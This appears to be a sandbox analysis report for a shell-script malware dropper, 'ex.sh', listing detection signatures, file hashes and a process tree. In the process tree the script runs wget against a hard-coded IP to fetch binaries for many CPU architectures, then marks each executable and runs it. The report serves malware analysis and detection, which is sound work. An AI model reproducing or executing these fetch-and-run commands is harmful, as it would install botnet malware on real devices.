Overview

overview

7

Static

static

1

ex.sh

ubuntu-18.04-amd64

7

ex.sh

debian-9-armhf

7

ex.sh

debian-9-mips

7

ex.sh

debian-9-mipsel

7

Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20221125-en
  • resource tags

    arch:armhfimage:debian9-armhf-20221125-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    01/07/2023, 08:29

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ex.sh

  • Size

    2KB

  • MD5

    c3b641509084438db6e1ab8be9e82990

  • SHA1

    73389eb6d835c8f9c6fb211e3727852222487f61

  • SHA256

    5b3e62c73008cded70fc70f1044c60a3caad8385d146bf5f5b7572ac29c65ca7

  • SHA512

    57630af7209eda6c6a36054aa50e6337373cb792857dadb53008972d75ed46e21a9f77fa2400aae5d5c63ca394dfb87ecc0aea91f4dbfb96192ba7a7e52e557d

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 10 IoCs
  • Reads system routing table 1 TTPs 1 IoCs

    Gets active network interfaces from /proc virtual filesystem.

  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 10 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ex.sh
    /tmp/ex.sh
    1⤵
      PID:360
      • /usr/bin/wget
        wget http://179.43.162.124/SBIDIOT/x86
        2⤵
        • Writes file to tmp directory
        PID:361
      • /bin/chmod
        chmod +x ex.sh systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
        2⤵
          PID:367
        • /tmp/x86
          ./x86
          2⤵
            PID:368
          • /usr/bin/wget
            wget http://179.43.162.124/SBIDIOT/mips
            2⤵
            • Executes dropped EXE
            • Writes file to tmp directory
            PID:370
          • /bin/chmod
            chmod +x ex.sh mips systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
            2⤵
              PID:372
            • /tmp/mips
              ./mips
              2⤵
                PID:373
              • /usr/bin/wget
                wget http://179.43.162.124/SBIDIOT/mpsl
                2⤵
                • Writes file to tmp directory
                PID:375
              • /bin/chmod
                chmod +x ex.sh mips mpsl systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
                2⤵
                • Executes dropped EXE
                PID:377
              • /tmp/mpsl
                ./mpsl
                2⤵
                  PID:378
                • /usr/bin/wget
                  wget http://179.43.162.124/SBIDIOT/arm
                  2⤵
                  • Writes file to tmp directory
                  PID:380
                • /bin/chmod
                  chmod +x arm ex.sh mips mpsl systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
                  2⤵
                    PID:382
                  • /tmp/arm
                    ./arm
                    2⤵
                    • Executes dropped EXE
                    PID:383
                  • /usr/bin/wget
                    wget http://179.43.162.124/SBIDIOT/arm5
                    2⤵
                      PID:384
                    • /tmp/arm5
                      ./arm5
                      2⤵
                        PID:386
                      • /usr/bin/wget
                        wget http://179.43.162.124/SBIDIOT/arm6
                        2⤵
                        • Writes file to tmp directory
                        PID:387
                      • /bin/chmod
                        chmod +x arm arm6 ex.sh mips mpsl systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
                        2⤵
                        • Executes dropped EXE
                        PID:389
                      • /tmp/arm6
                        ./arm6
                        2⤵
                        • Reads runtime system information
                        PID:390
                      • /usr/bin/wget
                        wget http://179.43.162.124/SBIDIOT/arm7
                        2⤵
                        • Writes file to tmp directory
                        PID:391
                      • /bin/chmod
                        chmod +x arm arm6 arm7 ex.sh mips mpsl systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
                        2⤵
                          PID:393
                        • /tmp/arm7
                          ./arm7
                          2⤵
                          • Reads system routing table
                          • Reads system network configuration
                          • Reads runtime system information
                          PID:394
                        • /usr/bin/wget
                          wget http://179.43.162.124/SBIDIOT/ppc
                          2⤵
                          • Writes file to tmp directory
                          PID:397
                        • /bin/chmod
                          chmod +x arm arm6 arm7 ex.sh mips mpsl ppc systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
                          2⤵
                            PID:399
                          • /tmp/ppc
                            ./ppc
                            2⤵
                            • Executes dropped EXE
                            PID:400
                          • /usr/bin/wget
                            wget http://179.43.162.124/SBIDIOT/m68k
                            2⤵
                            • Writes file to tmp directory
                            PID:402
                          • /bin/chmod
                            chmod +x arm arm6 arm7 ex.sh m68k mips mpsl ppc systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
                            2⤵
                              PID:404
                            • /tmp/m68k
                              ./m68k
                              2⤵
                                PID:405
                              • /usr/bin/wget
                                wget http://179.43.162.124/SBIDIOT/sh4
                                2⤵
                                • Executes dropped EXE
                                • Writes file to tmp directory
                                PID:407
                              • /bin/chmod
                                chmod +x arm arm6 arm7 ex.sh m68k mips mpsl ppc sh4 systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
                                2⤵
                                  PID:409
                                • /tmp/sh4
                                  ./sh4
                                  2⤵
                                    PID:410
                                  • /usr/bin/wget
                                    wget http://179.43.162.124/SBIDIOT/spc
                                    2⤵
                                    • Writes file to tmp directory
                                    PID:412
                                  • /bin/chmod
                                    chmod +x arm arm6 arm7 ex.sh m68k mips mpsl ppc sh4 spc systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
                                    2⤵
                                      PID:414
                                    • /tmp/spc
                                      ./spc
                                      2⤵
                                        PID:415
                                      • /usr/bin/wget
                                        wget http://179.43.162.124/SBIDIOT/arc
                                        2⤵
                                        • Executes dropped EXE
                                        PID:417
                                      • /bin/chmod
                                        chmod +x arm arm6 arm7 ex.sh m68k mips mpsl ppc sh4 spc systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
                                        2⤵
                                          PID:419
                                        • /tmp/arc
                                          ./arc
                                          2⤵
                                            PID:420
                                          • /usr/bin/wget
                                            wget http://179.43.162.124/SBIDIOT/x86_64
                                            2⤵
                                              PID:421
                                            • /bin/chmod
                                              chmod +x arm arm6 arm7 ex.sh m68k mips mpsl ppc sh4 spc systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timedated.service-WdsjWL systemd-private-ca57f2bc1aa545b39570568d2490d130-systemd-timesyncd.service-V12ecy x86
                                              2⤵
                                              • Executes dropped EXE
                                              PID:423
                                            • /tmp/x86_64
                                              ./x86_64
                                              2⤵
                                                PID:424

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • /tmp/arm
                                              Filesize

                                              45KB

                                              MD5

                                              8628ff5ea810a077094826fc1eca9e8b

                                              SHA1

                                              17ed361eb5136036e87915a7606863f6097705c0

                                              SHA256

                                              beea6775642378fd042f2ba5bcf10e228fff3cda5d71cd7ebefe21a3ee38ed39

                                              SHA512

                                              d35df900de4e5cb60eb657e6a6fbd6dc1fb3fdddeb5d799450fc33c15e707288ff144f54d656b58595e58c460a7b64e2876466cf4318333ffb2d141964aa55b5

                                              Download Submit

                                            • /tmp/arm6
                                              Filesize

                                              50KB

                                              MD5

                                              ce00361b626d7e94c56103c62c20b0bb

                                              SHA1

                                              204aba2b7745359e62e590240b99ee50c5809ffc

                                              SHA256

                                              f2fe7895b4f1862aaa7261486a2ecd2e997ced53cad4a514c71f1412fa50af29

                                              SHA512

                                              6a71ff7dc8d935b3f428735a32db5d28ebc2e3fefd11268661af6a90dd35de196d3706448bd2ba7caa626063cb228492a50fc18ef88b4b27f2216e63733ca9a1

                                              Download Submit

                                            • /tmp/arm7
                                              Filesize

                                              72KB

                                              MD5

                                              7197d2dd373016bb3dec80bf0430789d

                                              SHA1

                                              3448c2f9bd347d01f399e36c05cf4053b6cc7c73

                                              SHA256

                                              ef28e3fb2199796b924da9fbcb0e012e1b97854b8affb24f014f702ede51cc88

                                              SHA512

                                              72ff957c4b21dabf464689ef778f341efa549d2cbdc9857c8ceddfba84e70a9c3478a57adba33ba1d7430d767606343b4709c1a57da75a6f04ae55991c1c74ef

                                              Download Submit

                                            • /tmp/m68k
                                              Filesize

                                              144KB

                                              MD5

                                              542257e660e467b012f528e5a23e73fb

                                              SHA1

                                              4327cd3f600d4d79662111f43af52e4c9f5e3fbb

                                              SHA256

                                              688558e964de1ebcf81f186d7bac28fe05ecdf181494373227bbfcb49783ff50

                                              SHA512

                                              59839c098e9aa721a4fe78030f9085cc07336cee6d638ff82b20585c5e0366d80e1b9c3bf33e521ad806d54f5ff9430e51493e9c87de943a806af2184c70867e

                                              Download Submit

                                            • /tmp/mips
                                              Filesize

                                              46KB

                                              MD5

                                              390c4d386b5beb32c5bb93cd4e9e1f8c

                                              SHA1

                                              378490ac2fb8af85123348ad047c76d34f639aac

                                              SHA256

                                              d153a69701012da53dd1e833225920c96bb1cb3b965204139e3d1f342717bc58

                                              SHA512

                                              98ad7cf938500d0e7d81edc37ae1a4a977ed082c19c8f66016903896a139f75504a39442971e3cb86802068d72384215879c4d92583f02ed67721742ab26a922

                                              Download Submit

                                            • /tmp/mpsl
                                              Filesize

                                              47KB

                                              MD5

                                              87e0ee49c52ea68af821635edf8340a7

                                              SHA1

                                              7dd936946eaf69beb0e17a8a78e7769c4f08096f

                                              SHA256

                                              3747fba78912e05b113b36d6e7e60af297a087911c5dae8d768ed8e100b12a06

                                              SHA512

                                              249104186bf35df41554fd51e80ef6aefee85ea74b8ed2a1fbfd2a178ae8a219d77cc5db8b2302f2d9bd8a38bbf15518ec42e0af4148880c1b4ee94087bca68b

                                              Download Submit

                                            • /tmp/ppc
                                              Filesize

                                              44KB

                                              MD5

                                              bf8dd796b39e5c457de48bc946f0893e

                                              SHA1

                                              254cb5875e1b0b599c1140011adb56e3dcf1a919

                                              SHA256

                                              5d6e73a7471a046a9dd4e38c1c216c7bdc891c1a00e66373b799bfa786ca8f1a

                                              SHA512

                                              8ba1b26255e9139404717d6af3cb35c3e07c59621ae4d7c721c9df506f5af596c05de6d7b56ca21441af61e03c7a7529ede823e454d36111e7d5384ffd29777c

                                              Download Submit

                                            • /tmp/sh4
                                              Filesize

                                              129KB

                                              MD5

                                              8ab84763dda5ee8d3ad62a1517a4eb59

                                              SHA1

                                              d7c567e728d88b3eff46ad2be52126fb8f758235

                                              SHA256

                                              bb3a97adef7bab15cea1d2d116b60f215153ba9e530c375089bc1c9ee34efcd0

                                              SHA512

                                              c78c68e28b59397ccdf3f8ff87ed836f665e6242dfe0db5a4355b8175aff8c259a5c432a33662311f25409ed184ee94d2d43f0ae31c691b868714426992db5db

                                              Download Submit

                                            • /tmp/spc
                                              Filesize

                                              147KB

                                              MD5

                                              ad5ceaa9278a9676cbc7e7eeb30b6406

                                              SHA1

                                              9c92dd06444f31c9fe3338319f40d0f51fe296a1

                                              SHA256

                                              a6ef477f86326e396722291dd451658d09009956c00cd8b0bcd0d6388c912b81

                                              SHA512

                                              da6eb00a1f6416c8f4651fff59c346cfac285f91d5f30c1b73a227cbf7cb13bf89da2bd540a3d923cb0a5059fa8afaf15eb176e92e8f95bbe09ecea684bbb006

                                              Download Submit

                                            • /tmp/x86
                                              Filesize

                                              36KB

                                              MD5

                                              2278e807b1f89e10d5962e02f459b383

                                              SHA1

                                              a13550a25ecd411ca147d1f3bfae39817bb9c8b9

                                              SHA256

                                              e105958e10ed3967ee55b7b024914e0cb6bf6cc2af5cd05ef26b203d043a96d4

                                              SHA512

                                              f7dd505ed65b60916f028909c6ef3ef0fd1a54c82a09d70109c63cfef188623d51989b231c33ee8b44f85eede5756033c77d0f75eb3499e50b67106ce128f167

                                              Download Submit